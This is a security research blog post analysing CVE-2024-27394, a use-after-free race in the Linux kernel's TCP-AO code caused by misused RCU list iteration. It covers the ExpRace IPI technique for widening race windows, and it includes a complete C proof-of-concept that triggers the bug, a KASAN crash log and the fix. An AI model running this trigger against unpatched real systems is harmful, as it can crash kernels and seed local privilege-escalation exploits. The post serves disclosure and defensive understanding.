Deep Dive into RCU Race Condition: Analysis of TCP-AO UAF (CVE-2024–27394)
Introduction
This blog post has an analysis of a Race Condition vulnerability caused by the incorrect use of an RCU API and a technique to reliably trigger it.
The vulnerability to be discussed is a TCP-AO UAF vulnerability, identified and patched by @V4bel of Theori, CVE-2024-27394
. This vulnerability was patched in April and has been backported to the Stable kernel.
Read-Copy-Update (RCU)
First, I’ll briefly explain the use of Read-Copy-Update (RCU)
and related APIs. RCU is a bit complicated to understand and use it correctly than other types of synchronization methods, so I'll only explain Tree RCU
, which is relevant to the vulnerability and corresponds to the CONFIG_TREE_RCU
setting among other RCU types. If you already know about RCU, you can skip this part.
RCU is a synchronization technique used in environments with a lot of read operations. While traditional locks (mutex, spin lock, etc.) block read operations during write operations, RCU minimizes overhead by allowing readers and writers to run concurrently.
RCU divides the Update
process into three stages: Removal
, Grace Period
, and Reclamation
. First, Removal
process is executed to remove pointers so that subsequent readers cannot access the data structure, and then RCU waits for all readers to finish (Grace Period
), and it will execute Reclamation
process, which destroys the data structure. RCU guarantees that no UAFs exists by preventing the data structure not to be freed by kfree()
while a reader is reading it. The term, Grace Period
, is a period of time waiting for all readers that have accessed the data structure to complete their work. This is important because readers running concurrently on different CPUs could get confused without it.
Let’s dive deeper into the main RCU APIs and examples. First, a reader calls rcu_read_lock()/rcu_read_unlock()
to specify Read-side Critical Section
. And when dereferencing a pointer protected by RCU, we need to use APIs like rcu_dereference()
, which acts as a memory barrier:
int example_reader(void)
{
int val;
rcu_read_lock();
val = rcu_dereference(global_ptr)->a;
rcu_read_unlock();
return val;
}
Note that rcu_read_lock()
calls preempt_disable()
to prohibit preemption if CONFIG_PREEMPT_RCU
is not set in the kernel. If CONFIG_PREEMPT_RCU
is set, rcu_read_lock()
increments current->rcu_read_lock_nesting
by 1 without prohibiting preemption. The kernel used to trigger this vulnerability has CONFIG_PREEMPT_RCU
enabled.
Next, updaters must not modify any data structure protected by RCU directly. Instead they must replace the data structure by using rcu_assign_pointer()
after allocating a new data structure and modifying it. And when performing this replacement operation, the Update-side Critical Section
must be built using a traditional lock, such as a spin lock
or mutex
, otherwise a Race Condition can occur between the Updaters
:
void example_reclaim(struct rcu_head *head)
{
struct example *old = container_of(head, struct example, rcu);
kfree(old);
}
void example_updater(int a)
{
struct example *new;
struct example *old;
new = kzalloc(sizeof(*new), GFP_KERNEL);
spin_lock(&global_lock);
old = rcu_dereference_protected(global_ptr, lockdep_is_held(&global_lock));
new->a = a;
rcu_assign_pointer(global_ptr, new);
spin_unlock(&global_lock);
call_rcu(&old->rcu, example_reclaim);
}
In the above code, call_rcu()
is a function that calls the registered callback (example_reclaim
) when all Read-side Critical Sections
ends and the Grace Period
is over. The registered reclaim callback is called in the Soft IRQ
context.
Now, example_reader()
and example_updater()
in the example above will not cause a Race Condition when executed simultaneously. The example_reader
function retrieves the original or a copy of the object from global_ptr
. Even if it retrieves the original object, it is ensured that the original object will only be kfree()-d after all Read-side Critical Sections
have ended.
Next, I will explain the RCU APIs related to lists. The function for adding a node to a list is list_add_rcu()
, the macro for iterating over a list is list_for_each_entry_rcu
, and the function for removing a node from a list is list_del_rcu()
. Examples of using these APIs are as follows.
void example_add(int a)
{
struct example *node;
node = kzalloc(sizeof(*node), GFP_KERNEL);
node->a = a;
spin_lock(&global_lock);
list_add_rcu(&node->list, &global_list);
spin_unlock(&global_lock);
}
void exmaple_iterate(void)
{
struct example *node;
rcu_read_lock();
list_for_each_entry_rcu(node, &global_list, list) {
pr_info("Value: %d\n", node->a);
}
rcu_read_unlock();
}
void example_del(void)
{
struct example *node, *tmp;
spin_lock(&global_lock);
list_for_each_entry_safe(node, tmp, &global_list, list) {
list_del_rcu(&node->list);
call_rcu(&node->rcu, example_reclaim);
}
spin_unlock(&global_lock);
}
The three functions in the example will not cause a Race Condition when executed simultaneously. Note that list_add_rcu()
is a write operation, so you must set up an Update-side Critical Section
using spin lock
, etc. And list_for_each_entry_rcu
must be used inside a Read-side Critical Section
protected by rcu_read_lock()
.
Additionally, hash linked-list(hlist)
has similar APIs: hlist_add_rcu()
, hlist_for_each_entry_rcu
, and hlist_del_rcu()
. The usage and caveats are the same as the API for list.
For more information on RCU, you can refer the Kernel Doc.
ExpRace
Race condition vulnerabilities in the Linux kernel typically occur between two or more functions within the same subsystem, such as between the ioctl()
and the write()
, or between gc
and sendmsg()
. However, CVE-2024-27394
is a little different because one of the two contexts where the race occurs is the callback of call_rcu()
, where the user has no direct control over their execution timing. Additionally, the race window is extremely narrow.
So I adopted a technique from the ExpRace paper accepted for USENIX Security '21
to trigger this vulnerability.
This paper describes techniques that use indirect interrupt generation mechanisms to extend the race window for increasing exploit reliability. One of the techniques introduced in the paper utilizes Reschedule Inter Processor Interrupts (Reschedule IPI)
, which is a soft IRQ
used to move tasks to specific processors or evenly distribute tasks on a system among multiple processors. The Reschedule IPI
can be generated by users to call the sched_setaffinity
system call.
Now, let’s take a quick look at how to use this technique. First, here’s an example kernel module. In the example, example_open()
is called when a user opens this device node via open()
.
static int example_open(struct inode *inode, struct file *file);
struct file_operations example_fops = {
.open = example_open,
};
static struct miscdevice example_driver = {
.minor = MISC_DYNAMIC_MINOR,
.name = "example",
.fops = &example_fops,
};
static int example_open(struct inode *inode, struct file *file)
{
printk(KERN_INFO "Step 1");
printk(KERN_INFO "Step 2");
printk(KERN_INFO "Step 3");
printk(KERN_INFO "Step 4");
return 0;
}
static int example_init(void)
{
int result;
result = misc_register(&example_driver);
if (result) {
printk(KERN_INFO "misc_register(): Misc device register failed");
return result;
}
return 0;
}
static void example_exit(void)
{
misc_deregister(&example_driver);
}
module_init(example_init);
module_exit(example_exit);
What if you want to extend the execution cycle between printk("Step 2")
and printk("Step 3")
of example_open()
? It's simple: just call the sched_setaffinity
syscall. (The following code was written based on the skeleton code from the ExpRace
paper):
void pin_this_task_to(int cpu)
{
cpu_set_t cset;
CPU_ZERO(&cset);
CPU_SET(cpu, &cset);
// if pid is NULL then calling thread is used
if (sched_setaffinity(0, sizeof(cpu_set_t), &cset))
err(1, "affinity");
}
void target_thread(void *arg)
{
int fd;
// Suppose that a victim thread is running on core 2.
pin_this_task_to(2);
while (1) {
fd = open("/dev/example", O_RDWR);
}
}
int main()
{
pthread_t thr;
pthread_create(&thr, NULL, target_thread, NULL);
// Send rescheduling IPI to core 2 to extend the race window.
pin_this_task_to(2);
...
Create a thread,
target_thread
, which callspin_this_task_to(2)
to pin itself to CPU #2, and then repeatedly callsopen()
on the example module. So,example_open()
function will be executed on CPU #2.Call
pin_this_task_to(2)
on the parent thread. If aReschedule IPI
is received from CPU #2 just afterprintk("Step 2")
returns in thetarget_thread
thread, the interrupt will migrate the parent thread into CPU #2. So, thetarget_thread
thread is going to be stall betweenprintk("Step 2")
andprintk("Step 3")
.After returning to the
target_thread
thread, the remainingprintk("Step 3")
andprintk("Step 4"
are called.
Now, if you run this code and check the kernel logs, you’ll see that the execution time between Step 1
and Step 2
is only 7 μs
, but the execution time between Step 2
and Step 3
is over 200000 μs
. This is because it was forcibly preempted by the Reschedule IPI
sent by the user right after Step 2
.
$ ./ipi_test
[ 2.906480] Step 1
[ 2.906487] Step 2 // 7 μs
[ 3.107129] Step 3 // 200642 μs
[ 3.107737] Step 4 // 608 μs
In other words, by applying this technique, we can create enough time gap longer than RCU Grace Period
to preempt a task at the certain time.
Of course, since the user cannot control the preemption timing, the task must be repeated until it is preempted at the desired point.
CVE-2024–27394: TCP Authentication Option Use-After-Free
The TCP Authentication Option (TCP AO)
is a network protocol option designed to enhance the security of TCP connections. This option replaces the existing TCP MD5 Signature Option, and serves to authenticate and verify data integrity over TCP connections.
CVE-2024-27394
occurs in the tcp_ao_connect_init()
function within net/ipv4/tcp_ao.c
. This function is invoked when a user uses the connect()
function to target an IPv4-based TCP socket, and has the following call stack:
connect()
=> __sys_connect()
=> __sys_connect_file()
=> inet_stream_connect()
=> __inet_stream_connect()
=> tcp_v4_connect()
=> tcp_connect()
=> tcp_connect_init()
=> tcp_ao_connect_init()
Thus, it is called during the connection preparation process regardless of the success of the peer connection.
The tcp_ao_connect_init()
function iterates over entries using hlist_for_each_entry_rcu
, freeing specific key
s that do not satisfy certain conditions. Although the use of call_rcu()
seems to be safe, there is an issue because tcp_ao_connect_init()
is not within an RCU Read-side Critical Section
.
void tcp_ao_connect_init(struct sock *sk)
{
struct tcp_sock *tp = tcp_sk(sk);
struct tcp_ao_info *ao_info;
union tcp_ao_addr *addr;
struct tcp_ao_key *key;
int family, l3index;
ao_info = rcu_dereference_protected(tp->ao_info,
lockdep_sock_is_held(sk));
if (!ao_info)
return;
/* Remove all keys that don't match the peer */
family = sk->sk_family;
if (family == AF_INET)
addr = (union tcp_ao_addr *)&sk->sk_daddr;
#if IS_ENABLED(CONFIG_IPV6)
else if (family == AF_INET6)
addr = (union tcp_ao_addr *)&sk->sk_v6_daddr;
#endif
else
return;
l3index = l3mdev_master_ifindex_by_index(sock_net(sk),
sk->sk_bound_dev_if);
hlist_for_each_entry_rcu(key, &ao_info->head, node) { // <==[2]
if (!tcp_ao_key_cmp(key, l3index, addr, key->prefixlen, family, -1, -1))
continue;
if (key == ao_info->current_key)
ao_info->current_key = NULL;
if (key == ao_info->rnext_key)
ao_info->rnext_key = NULL;
hlist_del_rcu(&key->node);
atomic_sub(tcp_ao_sizeof_key(key), &sk->sk_omem_alloc);
call_rcu(&key->rcu, tcp_ao_key_free_rcu);
// <==[1]
}
If the call_rcu()
completes immediately after, and the RCU Grace Period ends[1]
, tcp_ao_key_free_rcu()
is invoked to free the key
. If during iteration, the next node of the already freed key
is accessed, a Use-After-Free vulnerability may occur.
This ao_info
and key
[2]
can be allocated by calling setsockopt()
with the TCP_AO_ADD_KEY
command as an argument:
int tcp_parse_ao(struct sock *sk, int cmd, unsigned short int family,
sockptr_t optval, int optlen)
{
if (WARN_ON_ONCE(family != AF_INET && family != AF_INET6))
return -EAFNOSUPPORT;
switch (cmd) {
case TCP_AO_ADD_KEY:
return tcp_ao_add_cmd(sk, family, optval, optlen); // <==[3]
case TCP_AO_DEL_KEY:
return tcp_ao_del_cmd(sk, family, optval, optlen);
case TCP_AO_INFO:
return tcp_ao_info_cmd(sk, family, optval, optlen);
default:
WARN_ON_ONCE(1);
return -EINVAL;
}
}
When setsockopt()
is called with TCP_AO_ADD_KEY
as an argument, tcp_ao_add_cmd()
is triggered[3]
. If this command is used for the first time on a TCP socket, ao_info
is allocated and stored in tcp_sk(sk)->ao_info
[4]
.
static int tcp_ao_add_cmd(struct sock *sk, unsigned short int family,
sockptr_t optval, int optlen)
{
...
ao_info = setsockopt_ao_info(sk);
if (IS_ERR(ao_info))
return PTR_ERR(ao_info);
if (!ao_info) {
ao_info = tcp_ao_alloc_info(GFP_KERNEL);
if (!ao_info)
return -ENOMEM;
first = true;
} else {
...
if (first) {
if (!static_branch_inc(&tcp_ao_needed.key)) {
ret = -EUSERS;
goto err_free_sock;
}
sk_gso_disable(sk);
rcu_assign_pointer(tcp_sk(sk)->ao_info, ao_info); // <==[4]
}
This means that per TCP socket, ao_info
is used uniquely, and in the same flow, key
is allocated and then linked with ao_info
[5]
:
static int tcp_ao_add_cmd(struct sock *sk, unsigned short int family,
sockptr_t optval, int optlen)
{
...
key = tcp_ao_key_alloc(sk, &cmd);
if (IS_ERR(key)) {
ret = PTR_ERR(key);
goto err_free_ao;
}
INIT_HLIST_NODE(&key->node);
memcpy(&key->addr, addr, (family == AF_INET) ? sizeof(struct in_addr) :
sizeof(struct in6_addr));
key->prefixlen = cmd.prefix;
key->family = family;
key->keyflags = cmd.keyflags;
key->sndid = cmd.sndid;
key->rcvid = cmd.rcvid;
key->l3index = l3index;
atomic64_set(&key->pkt_good, 0);
atomic64_set(&key->pkt_bad, 0);
ret = tcp_ao_parse_crypto(&cmd, key);
if (ret < 0)
goto err_free_sock;
if (!((1 << sk->sk_state) & (TCPF_LISTEN | TCPF_CLOSE))) {
tcp_ao_cache_traffic_keys(sk, ao_info, key);
if (first) {
ao_info->current_key = key;
ao_info->rnext_key = key;
}
}
tcp_ao_link_mkt(ao_info, key); // <==[5]
In the tcp_ao_add_cmd()
function, a new key
is allocated and initialized. The key
contains user-specified values such as sndid
and rcvid
, as well as the security key string, and is then linked to the ao_info->head
.
This sets the stage for reaching the vulnerable hlist_for_each_entry_rcu
in the tcp_ao_connect_init()
function. To trigger the vulnerability, call_rcu()
must be called immediately after. The RCU Grace Period
must then end, which triggers the tcp_ao_key_free_rcu()
callback and frees the key.
However, naturally occurring conditions where the RCU Grace Period
ends right after call_rcu()
are rare. Therefore, the Reschedule IPI
technique must be used to reliably trigger this scenario. The trigger scenario would be as follows:
cpu0 cpu1
setsockopt(A, TCP_AO_ADD_KEY)
key = tcp_ao_key_alloc() // key alloc
sched_setaffinity(0)
connect(A)
tcp_ao_connect_init(A)
hlist_for_each_entry_rcu {
call_rcu(key)
sched_setaffinity(0)
[ Send Reschedule IPI to cpu0 ]
[ connect(A) is preempted ]
connect(B)
...
[ End of RCU Grace Period ]
__do_softirq(A)
rcu_core(A)
tcp_ao_key_free_rcu(A)
kfree(key) // key freed
[ Returning to connect(A) ]
hlist_for_each_entry_rcu {
key->next // UAF
setsockopt(TCP_AO_ADD_KEY)
is called to allocateao_info
andkey
for the TCP socket, with at least twokey
s allocated.The process is then pinned to CPU #0 and
connect()
is called, leading totcp_ao_connect_init()
wherecall_rcu()
is executed.After this, another process calls
sched_setaffinity(0)
to send a Reschedule IPI to CPU #0, causing the process runningtcp_ao_connect_init()
to be preempted right aftercall_rcu()
returns.The
RCU Grace Period
ends, triggering thetcp_ao_key_free_rcu()
callback registered bycall_rcu()
, which then kfree()s thekey
.When the preempted process resumes and returns to
tcp_ao_connect_init()
, it accesses the already kfree()-dkey
viahlist_for_each_entry_rcu
, leading to a Use-After-Free vulnerability.
To increase the likelihood of correctly preempting tcp_ao_connect_init()
during the iteration of hlist_for_each_entry_rcu
, multiple key
s should be linked during the setup phase. However, there is a limitation on the number of key
s that can be connected due to the unique sndid
and rcvid
requirements. Since these fields are of u8
type, only 256 unique key
s can be linked to one ao_info
.
static int tcp_ao_add_cmd(struct sock *sk, unsigned short int family,
sockptr_t optval, int optlen)
{
...
ao_info = setsockopt_ao_info(sk);
if (IS_ERR(ao_info))
return PTR_ERR(ao_info);
if (!ao_info) {
ao_info = tcp_ao_alloc_info(GFP_KERNEL);
if (!ao_info)
return -ENOMEM;
first = true;
} else { // <==[6]
/* Check that neither RecvID nor SendID match any
* existing key for the peer, RFC5925 3.1:
* > The IDs of MKTs MUST NOT overlap where their
* > TCP connection identifiers overlap.
*/
if (__tcp_ao_do_lookup(sk, l3index, addr, family, cmd.prefix, -1, cmd.rcvid))
return -EEXIST;
if (__tcp_ao_do_lookup(sk, l3index, addr, family,
cmd.prefix, cmd.sndid, -1))
return -EEXIST;
}
In the tcp_ao_add_cmd()
function, if ao_info
is already allocated it proceeds to check[6]
the sndid
and rcvid
of the existing key
s. Should the sndid
or rcvid
values provided by the user during a key
allocation request overlap with any existing values, the allocation is cancelled. Therefore, the number of key
s that can be linked is limited to the maximum values of the sndid
and rcvid
members, which are u8
types and thus can only range from 0 ~ 255
. This means that only 256 key
s can be linked to a single ao_info
:
struct tcp_ao_key {
...
u8 sndid;
u8 rcvid;
...
};
The following is Proof-of-Concept (PoC) code that triggers the vulnerability:
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define PORT 8080
#define TCP_AO_ADD_KEY 38
#define TCP_AO_MAXKEYLEN 80
#define DEFAULT_TEST_PASSWORD "In this hour, I do not believe that any darkness will endure."
#define DEFAULT_TEST_ALGO "cmac(aes128)"
#define TCP_AO_KEYF_IFINDEX (1 << 0)
#define KEY_COUNT 255
#define SOCK_COUNT 200
#define LOOP_COUNT 5
struct tcp_ao_add { /* setsockopt(TCP_AO_ADD_KEY) */
struct __kernel_sockaddr_storage addr; /* peer's address for the key */
char alg_name[64]; /* crypto hash algorithm to use */
__s32 ifindex; /* L3 dev index for VRF */
__u32 set_current :1, /* set key as Current_key at once */
set_rnext :1, /* request it from peer with RNext_key */
reserved :30; /* must be 0 */
__u16 reserved2; /* padding, must be 0 */
__u8 prefix; /* peer's address prefix */
__u8 sndid; /* SendID for outgoing segments */
__u8 rcvid; /* RecvID to match for incoming seg */
__u8 maclen; /* length of authentication code (hash) */
__u8 keyflags; /* see TCP_AO_KEYF_ */
__u8 keylen; /* length of ::key */
__u8 key[TCP_AO_MAXKEYLEN];
} __attribute__((aligned(8)));
struct sockaddr_in serv_addr;
void pin_this_task_to(int cpu)
{
cpu_set_t cset;
CPU_ZERO(&cset);
CPU_SET(cpu, &cset);
if (sched_setaffinity(0, sizeof(cpu_set_t), &cset))
perror("affinity");
}
int random_val(int a, int b)
{
int random_value;
srand(time(NULL));
random_value = rand() % (b - a + 1) + a;
return random_value;
}
void ao_add_key(int sock, __u8 prefix, __u8 sndid, __u8 rcvid, __u32 saddr)
{
struct tcp_ao_add *ao;
struct sockaddr_in addr = {};
ao = (struct tcp_ao_add *)malloc(sizeof(*ao));
memset(ao, 0, sizeof(*ao));
ao->set_current = !!0;
ao->set_rnext = !!0;
ao->prefix = prefix;
ao->sndid = sndid;
ao->rcvid = rcvid;
ao->maclen = 0;
ao->keyflags = 0;
ao->keylen = 16;
ao->ifindex = 0;
addr.sin_family = AF_INET;
addr.sin_port = 0;
addr.sin_addr.s_addr = saddr;
strncpy(ao->alg_name, DEFAULT_TEST_ALGO, 64);
memcpy(&ao->addr, &addr, sizeof(struct sockaddr_in));
memcpy(ao->key, "1234567890123456", 16);
if (setsockopt(sock, IPPROTO_TCP, TCP_AO_ADD_KEY, ao, sizeof(*ao)) < 0) {
perror("setsockopt TCP_AO_ADD_KEY failed");
close(sock);
exit(EXIT_FAILURE);
}
free(ao);
}
void add_key(int sock)
{
ao_add_key(sock, 0, 0, 0, 0);
for (int i = 1; i < KEY_COUNT; i++) {
ao_add_key(sock, 31, 0 + i, 0 + i, 0x00010101);
}
}
void ao_connect(int socks[])
{
pid_t pid;
for (int i = 0; i < SOCK_COUNT; i++) {
pid = fork();
if (pid == 0) {
pin_this_task_to(0);
if (connect(socks[i], (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) {
printf("\nConnection Failed \n");
exit(EXIT_FAILURE);
}
} else {
usleep(random_val(50000, 100000));
kill(pid, SIGKILL);
wait(NULL);
}
}
}
int main()
{
pid_t pid;
serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons(PORT);
if (inet_pton(AF_INET, "127.0.0.1", &serv_addr.sin_addr) <= 0) {
printf("\nInvalid address/ Address not supported \n");
exit(EXIT_FAILURE);
}
while (1) {
pid = fork();
if (pid == 0) {
int socks[LOOP_COUNT][SOCK_COUNT];
pthread_t thr[LOOP_COUNT];
for (int i = 0; i < LOOP_COUNT; i++) {
for (int j = 0; j < SOCK_COUNT; j++) {
if ((socks[i][j] = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
printf("\n Socket creation error \n");
exit(EXIT_FAILURE);
}
add_key(socks[i][j]);
}
}
for (int i = 0; i < LOOP_COUNT; i++)
pthread_create(&thr[i], NULL, ao_connect, socks[i]);
sleep(15);
exit(0);
} else {
int status;
waitpid(pid, &status, 0);
sleep(0.1);
}
}
return 0;
}
Here is a step-by-step explanation of the PoC code. First, 1000 TCP sockets are created and then add_key()
is called to allocate ao_info
to each socket and link 256 key
s. This avoids unnecessary allocation tasks during later preemption.
#define KEY_COUNT 255
#define SOCK_COUNT 200
#define LOOP_COUNT 5
void add_key(int sock)
{
ao_add_key(sock, 0, 0, 0, 0);
for (int i = 1; i < KEY_COUNT; i++) {
ao_add_key(sock, 31, 0 + i, 0 + i, 0x00010101);
}
}
int main()
{
...
while (1) {
pid = fork();
if (pid == 0) {
int socks[LOOP_COUNT][SOCK_COUNT];
pthread_t thr[LOOP_COUNT];
for (int i = 0; i < LOOP_COUNT; i++) {
for (int j = 0; j < SOCK_COUNT; j++) {
if ((socks[i][j] = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
printf("\n Socket creation error \n");
exit(EXIT_FAILURE);
}
add_key(socks[i][j]);
}
}
Next, five ao_connect
threads are created and executed. Each ao_connect
thread first calls pin_this_task_to(0)
to pin subsequent operations to CPU #0. Then, it calls connect()
on a TCP socket that had key
s linked during the previous preparation phase to trigger tcp_ao_connect_init()
. The reason for dividing the 1000 sockets among five threads is to enable the five ao_connect
threads to continuously send Reschedule IPI
s and preempt each other within the traversal of hlist_for_each_entry_rcu
when they call pin_this_task_to(0)
.
#define KEY_COUNT 255
#define SOCK_COUNT 200
#define LOOP_COUNT 5
void pin_this_task_to(int cpu)
{
cpu_set_t cset;
CPU_ZERO(&cset);
CPU_SET(cpu, &cset);
if (sched_setaffinity(0, sizeof(cpu_set_t), &cset))
perror("affinity");
}
void ao_connect(int socks[])
{
pid_t pid;
for (int i = 0; i < SOCK_COUNT; i++) {
pid = fork();
if (pid == 0) {
pin_this_task_to(0);
if (connect(socks[i], (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) {
printf("\nConnection Failed \n");
exit(EXIT_FAILURE);
}
} else {
usleep(random_val(50000, 100000));
kill(pid, SIGKILL);
wait(NULL);
}
}
}
int main()
{
...
for (int i = 0; i < LOOP_COUNT; i++)
pthread_create(&thr[i], NULL, ao_connect, socks[i]);
Now, by running the PoC code on a kernel with KASAN and CONFIG_PREEMPT=y
enabled, you can obtain the following KASAN log.
[ 355.599161] ==================================================================
[ 355.599841] BUG: KASAN: slab-use-after-free in tcp_ao_connect_init+0x66d/0x7e0
[ 355.600479] Read of size 8 at addr ffff88810a3d0400 by task poc/17851
[ 355.601113]
[ 355.601257] CPU: 0 PID: 17851 Comm: poc Not tainted 6.8.4 #17
[ 355.601829] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[ 355.602557] Call Trace:
[ 355.602778]
[ 355.602972] dump_stack_lvl+0x44/0x60
[ 355.603300] print_report+0xc2/0x610
[ 355.604404] kasan_report+0xac/0xe0
[ 355.605029] tcp_ao_connect_init+0x66d/0x7e0
[ 355.605827] tcp_connect+0x2df/0x5230
[ 355.607237] tcp_v4_connect+0x10d5/0x1860
[ 355.607744] __inet_stream_connect+0x389/0xe80
[ 355.609741] inet_stream_connect+0x53/0xa0
[ 355.609989] __sys_connect+0x101/0x130
[ 355.611054] __x64_sys_connect+0x6e/0xb0
[ 355.611533] do_syscall_64+0x7e/0x120
[ 355.613167] entry_SYSCALL_64_after_hwframe+0x73/0x7b
[ 355.613474] RIP: 0033:0x4557cb
[ 355.613664] Code: 83 ec 18 89 54 24 0c 48 89 34 24 89 7c 24 08 e8 ab 8c 02 00 8b 54 24 0c 48 8b 34 24 41 89 c0 8b 7c 24 08 b8 2a 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 35 44 89 c7 89 44 24 08 e8 f1 8c 02 00 8b 44
[ 355.614784] RSP: 002b:00007d73c9e001a0 EFLAGS: 00000293 ORIG_RAX: 000000000000002a
[ 355.615237] RAX: ffffffffffffffda RBX: 00007d73c9e00640 RCX: 00000000004557cb
[ 355.615673] RDX: 0000000000000010 RSI: 00000000004e6380 RDI: 0000000000000096
[ 355.616106] RBP: 00007d73c9e001d0 R08: 0000000000000000 R09: 00007d73c9e00640
[ 355.616539] R10: 00007d73c9e00910 R11: 0000000000000293 R12: 00007d73c9e00640
[ 355.616970] R13: 0000000000000000 R14: 0000000000416320 R15: 00007d73c9600000
[ 355.617409]
[ 355.617547]
[ 355.617644] Allocated by task 17110:
[ 355.617865] kasan_save_stack+0x20/0x40
[ 355.618104] kasan_save_track+0x10/0x30
[ 355.618340] __kasan_kmalloc+0x7b/0x90
[ 355.618574] __kmalloc+0x207/0x4e0
[ 355.618787] sock_kmalloc+0xdf/0x130
[ 355.619008] tcp_ao_add_cmd+0xa59/0x1d60
[ 355.619250] do_tcp_setsockopt+0xb19/0x2f60
[ 355.619509] do_sock_setsockopt+0x1e5/0x3f0
[ 355.619766] __sys_setsockopt+0x101/0x1a0
[ 355.620011] __x64_sys_setsockopt+0xb9/0x150
[ 355.620274] do_syscall_64+0x7e/0x120
[ 355.620503] entry_SYSCALL_64_after_hwframe+0x73/0x7b
[ 355.620812]
[ 355.620909] Freed by task 17853:
[ 355.621109] kasan_save_stack+0x20/0x40
[ 355.621349] kasan_save_track+0x10/0x30
[ 355.621586] kasan_save_free_info+0x37/0x60
[ 355.621842] __kasan_slab_free+0x102/0x190
[ 355.622093] kfree+0xd8/0x2c0
[ 355.622282] rcu_core+0xb2c/0x15b0
[ 355.622491] __do_softirq+0x1c7/0x612
[ 355.622717]
[ 355.622814] Last potentially related work creation:
[ 355.623116] kasan_save_stack+0x20/0x40
[ 355.623351] __kasan_record_aux_stack+0x8e/0xa0
[ 355.623633] __call_rcu_common.constprop.0+0x6f/0x730
[ 355.623946] tcp_ao_connect_init+0x325/0x7e0
[ 355.624194] tcp_connect+0x2df/0x5230
[ 355.624415] tcp_v4_connect+0x10d5/0x1860
[ 355.624659] __inet_stream_connect+0x389/0xe80
[ 355.624934] inet_stream_connect+0x53/0xa0
[ 355.625192] __sys_connect+0x101/0x130
[ 355.625429] __x64_sys_connect+0x6e/0xb0
[ 355.625669] do_syscall_64+0x7e/0x120
[ 355.625894] entry_SYSCALL_64_after_hwframe+0x73/0x7b
[ 355.626209]
[ 355.626309] The buggy address belongs to the object at ffff88810a3d0400
[ 355.626309] which belongs to the cache kmalloc-256 of size 256
[ 355.627059] The buggy address is located 0 bytes inside of
[ 355.627059] freed 256-byte region [ffff88810a3d0400, ffff88810a3d0500)
[ 355.627788]
[ 355.627889] The buggy address belongs to the physical page:
[ 355.628229] page:00000000cc00e344 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x10a3d0
[ 355.628797] head:00000000cc00e344 order:1 entire_mapcount:0 nr_pages_mapped:0 pincount:0
[ 355.629285] anon flags: 0x200000000000840(slab|head|node=0|zone=2)
[ 355.629663] page_type: 0xffffffff()
[ 355.629880] raw: 0200000000000840 ffff888100042b40 0000000000000000 dead000000000001
[ 355.630348] raw: 0000000000000000 0000000000100010 00000001ffffffff 0000000000000000
[ 355.630812] page dumped because: kasan: bad access detected
[ 355.631151]
[ 355.631251] Memory state around the buggy address:
[ 355.631545] ffff88810a3d0300: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 355.631984] ffff88810a3d0380: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 355.632420] >ffff88810a3d0400: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 355.632854] ^
[ 355.633056] ffff88810a3d0480: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 355.633491] ffff88810a3d0500: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 355.633931] ==================================================================
[ 355.634447] Disabling lock debugging due to kernel taint
Since this vulnerability occurs in TCP, it can be triggered without the need to create a separate Network Namespace
.
In the end, I patched this CVE-2024-27394
by replacing hlist_for_each_entry_rcu
with hlist_for_each_entry_safe
to prevent UAF regardless of the RCU Read-side Critical Section
.
diff --git a/net/ipv4/tcp_ao.c b/net/ipv4/tcp_ao.c
index 3afeeb68e8a7..781b67a52571 100644
--- a/net/ipv4/tcp_ao.c
+++ b/net/ipv4/tcp_ao.c
@@ -1068,6 +1068,7 @@ void tcp_ao_connect_init(struct sock *sk)
{
struct tcp_sock *tp = tcp_sk(sk);
struct tcp_ao_info *ao_info;
+ struct hlist_node *next;
union tcp_ao_addr *addr;
struct tcp_ao_key *key;
int family, l3index;
@@ -1090,7 +1091,7 @@ void tcp_ao_connect_init(struct sock *sk)
l3index = l3mdev_master_ifindex_by_index(sock_net(sk),
sk->sk_bound_dev_if);
- hlist_for_each_entry_rcu(key, &ao_info->head, node) {
+ hlist_for_each_entry_safe(key, next, &ao_info->head, node) {
if (!tcp_ao_key_cmp(key, l3index, addr, key->prefixlen, family, -1, -1))
continue;
Conclusion
This post analyzed the vulnerability CVE-2024-27394
, which arose from the incorrect use of RCU, and introduced a method to reliably trigger it using the ExpRace technique.
In the case of Race Conditions caused by the incorrect use of RCU, it can be challenging to identify vulnerabilities because there are various types of RCU APIs, and Read-side Critical Sections
can be nested. Therefore, more focused analysis is required to find such RCU Race Condition vulnerabilities.